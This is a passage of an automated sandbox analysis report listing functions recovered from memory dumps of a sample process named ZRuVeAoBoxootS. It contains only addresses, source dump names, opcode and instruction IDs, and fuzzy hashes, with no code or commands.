                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 928f31884cbd46629f7c2e1d784dffae97389a7c591a7016239b1ce23165900b
                        • Instruction ID: 8a904362fd32bb85cb90aae893c325061f728d60321948911ce052820da50612
                        • Opcode Fuzzy Hash: 928f31884cbd46629f7c2e1d784dffae97389a7c591a7016239b1ce23165900b
                        • Instruction Fuzzy Hash: A151F534A10605CFCB04EF68C89899DBBF6FF89705B1585A9E5069B371EB70ED46CB40
                        Function 04F31644 Relevance: .1, Instructions: 136COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee67376b19ec210653d56478d71e63367d52663be7c2c550b709b6ff79cfdd89
                        • Instruction ID: af93dd30326ecf6847303514eefd54b5d0cf761176bd03a3e6ffa1dbdcf6c9bb
                        • Opcode Fuzzy Hash: ee67376b19ec210653d56478d71e63367d52663be7c2c550b709b6ff79cfdd89
                        • Instruction Fuzzy Hash: F4319070E02218DFDB14DFA0E9845DDBBB2FF85316F228499E44267791DB31AC66CB50
                        Function 04F37940 Relevance: .1, Instructions: 127COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5f70c5d2e9897a5ccc68f670299e4f2c2b70512bed210b28d5fda753f47b739
                        • Instruction ID: 0b29fae5de53d023e6ae0711becd9258bf52be9522b0b7ff039f85c6af6096a3
                        • Opcode Fuzzy Hash: d5f70c5d2e9897a5ccc68f670299e4f2c2b70512bed210b28d5fda753f47b739
                        • Instruction Fuzzy Hash: 3F418875B142548FDB14EF69C884EADBBF6BF89705F1480A9E501EB3A1CB31E801CB10
                        Function 04F3A548 Relevance: .1, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5950c5af335daed2bb95827d4687ed4ed040044015d7ae10764897b69b8a3240
                        • Instruction ID: 807f6cb2f336483bde9a028ba86409a778daee34847c6b51915406fa3dd388a7
                        • Opcode Fuzzy Hash: 5950c5af335daed2bb95827d4687ed4ed040044015d7ae10764897b69b8a3240
                        • Instruction Fuzzy Hash: 4D417A75E01219CBDF11EFBAE844AEDBBF1AB88315F144029D845EB350DB35E802DBA0
                        Function 04F3A9F0 Relevance: .1, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61bc78e34155e16347350c537a4dc5c8dc52b82e9330eb4462ec19f0ee1a5972
                        • Instruction ID: 2a37e5a15eab2d4d64da90deb6ae38d91cc06403f6ecdf0e0d78ca3e05152703
                        • Opcode Fuzzy Hash: 61bc78e34155e16347350c537a4dc5c8dc52b82e9330eb4462ec19f0ee1a5972
                        • Instruction Fuzzy Hash: 2F41D631E05608DFDB00EF78C94099EBBB5FF89300F1585A9E545AB225EB30E945CB91
                        Function 04F363B0 Relevance: .1, Instructions: 123COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a77022b7586a38db22cf4ca3d859c85c91676b13e13adde41be7f756de9daa0
                        • Instruction ID: b8296a0785320c6ff4413d9d4e497f547ee62b4adbf5a4971acf53759d1ba9f2
                        • Opcode Fuzzy Hash: 7a77022b7586a38db22cf4ca3d859c85c91676b13e13adde41be7f756de9daa0
                        • Instruction Fuzzy Hash: 11510935A01209EFEB10DF95D594B9EBBB2FF88311F208069E905AB355CB31AD12CF60
                        Function 04F35AD0 Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aae94d99f3d5d7ebdd5b86df9a1a467e9e000d991c798dbdcc1d21a687707560
                        • Instruction ID: c20886964c33202cbed447113cb48713a0f4fddf37ae5a863a7139d1ab07469f
                        • Opcode Fuzzy Hash: aae94d99f3d5d7ebdd5b86df9a1a467e9e000d991c798dbdcc1d21a687707560
                        • Instruction Fuzzy Hash: E0417C34A00248DFDB15DF68D594ADDBBF2EF89718F1094A9D10AAB3A1CB72AC05CF51
                        Function 04F35D28 Relevance: .1, Instructions: 118COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f38b253ef62821dd09573614cc9bc820fc4793b449428ac263ae18ea63178113
                        • Instruction ID: d4c40606b26458a3b409c9ca332de18c6d73fa48c8a6e08d9280819187f64c80
                        • Opcode Fuzzy Hash: f38b253ef62821dd09573614cc9bc820fc4793b449428ac263ae18ea63178113
                        • Instruction Fuzzy Hash: 7C41F935A002189FDB54EBA8C894BDDB7B1BF89715F114068E905EB3A1D739A842CF60
                        Function 04F35AE0 Relevance: .1, Instructions: 114COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 146c0a83cfff253daf2bf192ae73752a207eacf813e36d96df2cef9a3308452e
                        • Instruction ID: d563b305ddc56c691511f4a5eb216527f5f8c66e62e62f3717b37fa44a1b9a40
                        • Opcode Fuzzy Hash: 146c0a83cfff253daf2bf192ae73752a207eacf813e36d96df2cef9a3308452e
                        • Instruction Fuzzy Hash: 88415934A00208DFDB15EF68D594ADDB7F2EF88718F1084A8D50AAB390CB72AD45CF91
                        Function 04F392F0 Relevance: .1, Instructions: 112COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9b1148b8acf4f09f8e8fc6dd9fc41fedd18ae1d804ceb8758ef55315b78ad55
                        • Instruction ID: 404348512a6f1415d6f94e5399bf9cc06867b76da7eaeb099c2544a55ce8f9d7
                        • Opcode Fuzzy Hash: b9b1148b8acf4f09f8e8fc6dd9fc41fedd18ae1d804ceb8758ef55315b78ad55
                        • Instruction Fuzzy Hash: F9414D71B002199FDF15DBA8D880AEEB7F6AF89305F104529E106E7390DBB4AD42CB85
                        Function 04F3D071 Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a0f0b104a9eec26f3712c25c5ba3f3eac3edcb20fda719d6f504b3d6527b199
                        • Instruction ID: 28a0476a607ab39e362b4309b5da867c4a0f21416f6d0567b47de69c6848a723
                        • Opcode Fuzzy Hash: 2a0f0b104a9eec26f3712c25c5ba3f3eac3edcb20fda719d6f504b3d6527b199
                        • Instruction Fuzzy Hash: 1F415F34A00709DFCB04EF78C884ADDBBB2FF89305F008559E5156B365EB71A946CB81
                        Function 04F38178 Relevance: .1, Instructions: 105COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b91f0ead82eced57ff441e666122a603c285b9491cbe474c299f9a367d23f1f
                        • Instruction ID: b42da7a585a1a5bfb442468820cfe3dcf9e686f27800ea9c742dd619cb567d6f
                        • Opcode Fuzzy Hash: 1b91f0ead82eced57ff441e666122a603c285b9491cbe474c299f9a367d23f1f
                        • Instruction Fuzzy Hash: 3E414C34A10709DFDB04EF68C894A9DB7B2FF89305F008559E515AB325EB71B946CB81
                        Function 04F3DDB0 Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f66172d8803e5b275da80a3351fc56b8ee0ace93fc36ae9ea9debab068d3333
                        • Instruction ID: 7c6099fbc35bfc41dffe01490e6d00ac5eed62d44ebf47f823eeb1942f72bd8d
                        • Opcode Fuzzy Hash: 4f66172d8803e5b275da80a3351fc56b8ee0ace93fc36ae9ea9debab068d3333
                        • Instruction Fuzzy Hash: 39317C31F083058FDB11ABB9E84469A7BF6EFC5320F158569E148AB241DF30AC49C7D6
                        Function 04F31544 Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65fbc4d1a38ef7381bd5eef0e0e7332e53b5edb04c2f6eb4e53dbf225555b31c
                        • Instruction ID: b72ff7db785c1027330d85df2a9bdda7319a40735b906199fb306e90e5273431
                        • Opcode Fuzzy Hash: 65fbc4d1a38ef7381bd5eef0e0e7332e53b5edb04c2f6eb4e53dbf225555b31c
                        • Instruction Fuzzy Hash: 5241E3B1D00349DBDB24CFA9C584ADDFBB5BF49304F648129D408BB250D7B5AA46CF90
                        Function 04F31CAE Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfd54e20a9fb24ef8792b224dc9f974efe75ac5f5eef8814e617003b354e14b0
                        • Instruction ID: a96523432339a42495418b4bc8e89efa72aa186c761ea572a4267a252607a72b
                        • Opcode Fuzzy Hash: dfd54e20a9fb24ef8792b224dc9f974efe75ac5f5eef8814e617003b354e14b0
                        • Instruction Fuzzy Hash: B341C2B1D00349DBDB24CFA9C584ACDFBB5BF49304F64852AD408BB254D7B56A8ACF90
                        Function 04F3ACF8 Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: af6cc40f1f59ea02d2d3b8cc03a3a557912ad3bbee2a846888009cddd3557802
                        • Instruction ID: 22db0e8cbc7d400c00a35292ee6617810ec0f72856b4cd23678ccdc324ecb2dc
                        • Opcode Fuzzy Hash: af6cc40f1f59ea02d2d3b8cc03a3a557912ad3bbee2a846888009cddd3557802
                        • Instruction Fuzzy Hash: 28410875A0020ADFCB44DF69D88499EFBB5FF89310B14C259E958AB315E730A986CF90
                        Function 04F30BF0 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d509314cad420aa5e2906d4d89b1495dafc17857aab79c2afba52eea27317edd
                        • Instruction ID: 30cffdb3b4eeeb280ecbabc9e808b1df295f7920e283c80f048aa0a70dd3ff38
                        • Opcode Fuzzy Hash: d509314cad420aa5e2906d4d89b1495dafc17857aab79c2afba52eea27317edd
                        • Instruction Fuzzy Hash: 1641A0B1D103589FDB14CFAAC984ADEFBB1BF48714F24822AE418BB250D7B46845CF91
                        Function 04F38A7C Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7301c135dd775e192b00ece8a15b20a7842ff1b702dce2b0b760a20682aab86
                        • Instruction ID: b52e46fc2ac060dbe17261149306ea5ab15756e519196ba7661202e1a266aab6
                        • Opcode Fuzzy Hash: c7301c135dd775e192b00ece8a15b20a7842ff1b702dce2b0b760a20682aab86
                        • Instruction Fuzzy Hash: 70319275A01300CBEB00EF7AD894B5577A2FFC9325F088679D84D6B249EBB8A845CB51
                        Function 04F3AD08 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba27aac16fd492aacdcc14e36c014d4b9c5512d541403fb9f45155f373d10a7b
                        • Instruction ID: aabc572232778e9b22e7644b8cc57124d8629a397296956423ee07f5f187be67
                        • Opcode Fuzzy Hash: ba27aac16fd492aacdcc14e36c014d4b9c5512d541403fb9f45155f373d10a7b
                        • Instruction Fuzzy Hash: 0741F775A0020ADFCB40DF69D88499EFBB5FF89310B14C659E918AB315E730E986CF90
                        Function 04F3CF78 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70d0c9c4087ed8b1a4a56c63dd67e4b7c53d6eb6b7e1226d04bfaadb614274e3
                        • Instruction ID: 47673ea35f8b58925c886073bdaa5c41d051c87cf959cd94d9a91985bc2ec69e
                        • Opcode Fuzzy Hash: 70d0c9c4087ed8b1a4a56c63dd67e4b7c53d6eb6b7e1226d04bfaadb614274e3
                        • Instruction Fuzzy Hash: 5A318F36A002159FCF04EF64E8548DDF7B6FF89215B048169F506AB325EB75BD46CB80
                        Function 04F39811 Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cbd17f51d954ba9eee0c8d5ff1bd1bbdc0c38dc4e4a463525ff3081f2e1d307a
                        • Instruction ID: 1b050f8ef1886c5e4b477fa27017aa9ae6fe543908f0b81feab865d912561885
                        • Opcode Fuzzy Hash: cbd17f51d954ba9eee0c8d5ff1bd1bbdc0c38dc4e4a463525ff3081f2e1d307a
                        • Instruction Fuzzy Hash: F731C175A01300CBEB10EF7AD884B5577A1FF89315F098679D8096B349EB78A845CB51
                        Function 04F3B2A4 Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b4bfaa56aa897729c5d8769caa6df43f272704aa28e601db4e64903b024b8a8
                        • Instruction ID: c02b3c10d370c8d98d85587e43d4dfe37a7b539b30b95746a06411dafc281a66
                        • Opcode Fuzzy Hash: 9b4bfaa56aa897729c5d8769caa6df43f272704aa28e601db4e64903b024b8a8
                        • Instruction Fuzzy Hash: E721A8327102018FD714DB6CC89566937D6EF85726F1981B5E109DF3A3DA75FC058B90
                        Function 04F31E27 Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8313816ef4ed5bccfee75552225117ed171d175d4077ebbb7eb48e34cef1feec
                        • Instruction ID: 9f055c0cfcce28540e68ea5a3fbf138fea821144576595d504f4ec2d026ecd68
                        • Opcode Fuzzy Hash: 8313816ef4ed5bccfee75552225117ed171d175d4077ebbb7eb48e34cef1feec
                        • Instruction Fuzzy Hash: B4219171F002455FEB41EBA9CD409FFBBFAEFC4255B04812AE455E3250EB709A038B90
                        Function 04F379C6 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0c37e4a96420261d3bc2c718c1d12cce00fdcff1644d49efbbee9e65d5a29a
                        • Instruction ID: ca56f67365d41b0402d4d71fe12f2a43f9278f4927778f75b575f9a2f77a7a4f
                        • Opcode Fuzzy Hash: 0f0c37e4a96420261d3bc2c718c1d12cce00fdcff1644d49efbbee9e65d5a29a
                        • Instruction Fuzzy Hash: C1312579B111148FDB44EF69D884AAC7BF6BF89706F1480A9E505EB3A1DB31ED02CB11
                        Function 04F392E1 Relevance: .1, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 936f179c4f8b8530bf9e6a657ab6fd8d6cb71dd77531ecf9cce761bd4d5c9eef
                        • Instruction ID: f12b1f8e8639e03e59ee591988f392577241b7b52847a87b005b0c125c5b05fe
                        • Opcode Fuzzy Hash: 936f179c4f8b8530bf9e6a657ab6fd8d6cb71dd77531ecf9cce761bd4d5c9eef
                        • Instruction Fuzzy Hash: F331C271F042049FCF14DBB9D840AAEB7F5AF89301F00442AE406E73A0EBB4AD02CB40
                        Function 04F31BA8 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6ff9017131ff275087781c34a777ec8ec215ba800e9a2b5f4cbb0258148849d
                        • Instruction ID: b40ea2086f7295e3804634b3ebcc0863c866a2807eb53d779153a40c687beb1d
                        • Opcode Fuzzy Hash: e6ff9017131ff275087781c34a777ec8ec215ba800e9a2b5f4cbb0258148849d
                        • Instruction Fuzzy Hash: 3321D331A002448FD711EF78D4588DBBBE6EF85614B15C8AAD106EB351EF75E80A8F91
                        Function 04F37C61 Relevance: .1, Instructions: 82COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73fca0b813e75bfa53423d9d75d93051c883b46ac29cb2e3e4db525a212293b0
                        • Instruction ID: f79d68ca0335048e1db66ef830d45f1bbdb3bddf64ee186505ca2fbff1206a6c
                        • Opcode Fuzzy Hash: 73fca0b813e75bfa53423d9d75d93051c883b46ac29cb2e3e4db525a212293b0
                        • Instruction Fuzzy Hash: 782105783505008FD758EF2DD898D2977E6EF8AB1572640A9E606CB3B1DA31EC028B50
                        Function 04F34C61 Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 944a866c6dfaec751736a9d0c9f5bd2a358137119246c2955396f2af2b1762cc
                        • Instruction ID: ede691ff1698a06baf132fd71566813c98cdaba09546dfee99db4e50f80e6d49
                        • Opcode Fuzzy Hash: 944a866c6dfaec751736a9d0c9f5bd2a358137119246c2955396f2af2b1762cc
                        • Instruction Fuzzy Hash: 05312232D14B0ADECB01EF78C854499F7B1FF95310B118A5AE5596B121FB30E695CB81
                        Function 04F31704 Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3252c96846be410134378a15b6e596624b5724396ee7bf05158bad31a4830b1f
                        • Instruction ID: 1c66472264baf358649c661ae740947f0076fb8f68f1ee82c29893c55cfba59e
                        • Opcode Fuzzy Hash: 3252c96846be410134378a15b6e596624b5724396ee7bf05158bad31a4830b1f
                        • Instruction Fuzzy Hash: 0E01BD32F182119FFB18567968586BF37DADBC965531605AAF005D3340EE24EC0383D0
                        Function 04F33DD8 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20a79cd71d1c7c6fac89620964073d232ec52b61be4a495938356c97cca5fff5
                        • Instruction ID: cb135c3175abd931914b7489db945c810ea6f96c69f3273c5f022e5edc01881c
                        • Opcode Fuzzy Hash: 20a79cd71d1c7c6fac89620964073d232ec52b61be4a495938356c97cca5fff5
                        • Instruction Fuzzy Hash: 2121A731B10B059FD734DF39D486A26B7F1FB45612F140E29E8AACB640D770F88A8B91
                        Function 0270D4C4 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675054945.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_270d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 704af04290792cb407a738c251c5b55709b00726d4c3800dd98826449537a7b5
                        • Instruction ID: 644ab4805e356bcbb18eb7c29f15a67c3dd86bb3ca9fea4ae11cc22aff48a1c2
                        • Opcode Fuzzy Hash: 704af04290792cb407a738c251c5b55709b00726d4c3800dd98826449537a7b5
                        • Instruction Fuzzy Hash: 4121F871504344DFDB25DF54D9C0B2ABFA5FB88318F24C569EC051B296C336D45ACAA2
                        Function 04F34C70 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e42c1b28ca6e5dbf87ecc111cfef237941211c3f6d974f254d5b43a84e0f201
                        • Instruction ID: f592532f66215f93b262450d2ff433ddc1f3243e7bccccf871d07bbf163109cf
                        • Opcode Fuzzy Hash: 4e42c1b28ca6e5dbf87ecc111cfef237941211c3f6d974f254d5b43a84e0f201
                        • Instruction Fuzzy Hash: F731FE32D10B0ADACB01EFB9C854499F7B1FF95310B118B5AE9596B221FB30E695CB81
                        Function 04F38FF9 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b99273d380457a6122b4be15da0474580e33a8ed79a0e7a327da0c01abce5232
                        • Instruction ID: 0365601d5743aa540f4bf014129144b4b08bc153c4bbb8cb5637bb786aeac1a1
                        • Opcode Fuzzy Hash: b99273d380457a6122b4be15da0474580e33a8ed79a0e7a327da0c01abce5232
                        • Instruction Fuzzy Hash: 3D214C743012108FDB18EB39C454E6977E6EF86726B1484AED506CB371DBB6EC02CB51
                        Function 0271D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675243197.000000000271D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0271D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_271d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a9b8754c95639a201f993355cdade2118f52e6707e5b8a1ea14dec699420264
                        • Instruction ID: f5be9b8cd57db2ab114d917d88da5c63ea27fe5ac633191e0ed48b9d445868c9
                        • Opcode Fuzzy Hash: 6a9b8754c95639a201f993355cdade2118f52e6707e5b8a1ea14dec699420264
                        • Instruction Fuzzy Hash: 9F210471504304EFEB29DF58D9C0B26BBA5FF88324F20C6ADE8595B252C336D446CE61
                        Function 0271D01C Relevance: .1, Instructions: 72COMMON
